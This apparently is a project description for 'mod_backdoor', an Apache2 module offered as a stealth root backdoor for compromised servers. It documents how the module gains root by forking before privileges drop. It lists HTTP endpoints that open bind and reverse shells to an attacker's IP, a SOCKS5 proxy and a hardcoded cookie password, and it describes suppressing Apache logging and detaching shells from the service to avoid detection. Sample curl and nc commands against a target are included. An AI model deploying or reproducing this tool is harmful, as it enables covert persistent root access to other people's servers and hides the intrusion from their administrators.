Apache2 mod_backdoor: a stealth backdoor using an Apache2 module
mod_backdoor is a stealth backdoor using an Apache2 module.
The main idea is to fork() the primary Apache2 process just after it has loaded its config. Since it’s forked before the root user transfers the process to www-data, you can execute the command as root.
As Apache2 loads its configuration only when you (re)start it, the challenge was to never let die this forked root apache2 process, to let us interact as root with the compromised system.
- Bind TTY Shell
- Reverse Shell (TTY, Native, PHP, Perl, Python, Ruby)
- High stability and reliability, each shell spawns a new forked independent root process attached to PID 1 and removed from apache2 cgroup
- Socks5 proxy
- Password Protection through cookie headers
- Ping module to know if it’s still active
- Bypass logging mechanism. Each request to the backdoor module are not logged by Apache2.
- The password is sent through Cookie headers: Cookie: password=backdoor. It’s defined with #define at the beginning of mod_backdoor.c, so you could easily edit it.
- Each following requests must contain this password to interact with the module.
- Each request containing this cookie will not be logged by Apache if the module is running.
- Each shell spawns attached to PID 1 and is removed from the apache2 cgroup. It means it’s possible to restart/stop apache2.service from a spawned shell (not true for TTY shells because an apache2 process is needed to do the bidirectional communication between socket and pty). It also improves stealth, shells are no longer related to apache2.service.
Bind TTY Shell
The endpoint http[s]://<TARGET>/bind/<PORT> binds a listening port on <TARGET>:<PORT>
When a connection is initiated to the listening port, the port closes.
forkpty() is used to obtain a native TTY shell, working with an IPC UNIX socket to communicate between forked TTY process and the new socket you just opened.
Shells could be easily upgraded with the famous trick:
CTRL-Z –> stty raw -echo –> fg –> reset
Reverse TTY Shell
It works like the bind shell, the endpoint http[s]://<TARGET>/revtty/<IP>/<PORT> returns a TTY shell to <IP>:<PORT>
Reverse Shell (No TTY)
The endpoint http[s]://<TARGET>/reverse/<IP>/<PORT>/<PROG> returns a shell to <IP>:<PORT>.
<PROG> must be one of these:
<PROG> must be in lower-case.
PHP uses the exec function.
Ruby isn’t using /bin/sh.
Source code comes from https://github.com/rofl0r/microsocks
The endpoint http[s]://<TARGET>/proxy/<PORT>/<USER> opens a socks5 proxy on <PORT>. <USER> is optional. If you set it, it activates the auth mode. The password is the same as the mod_backdoor.
Once a specific ip address authed successfully with user:pass, it is added to a whitelist and may use the proxy without auth. This is handy for programs like firefox that don’t support user:pass auth.
For it to work you’d basically make one connection with another program that supports it, and then you can use firefox too.
- curl -H ‘Cookie: password=backdoor’ http://<TARGET>/proxy/1337/vlad
–> Start socks proxy on port 1337 for vlad user
- curl -x socks5://vlad:password=backdoor@<TARGET>:1337 https://www.google.com
–> Register your IP address
- You could now use it without auth
- When you’re done, you can kill the socks proxy by sending imdonewithyou in a socket
–> echo “imdonewithyou” | nc <TARGET> 1337
The endpoint http[s]://<TARGET>/ping tells you if the module is currently working.
Author: Vlad Rico (@RicoVlad)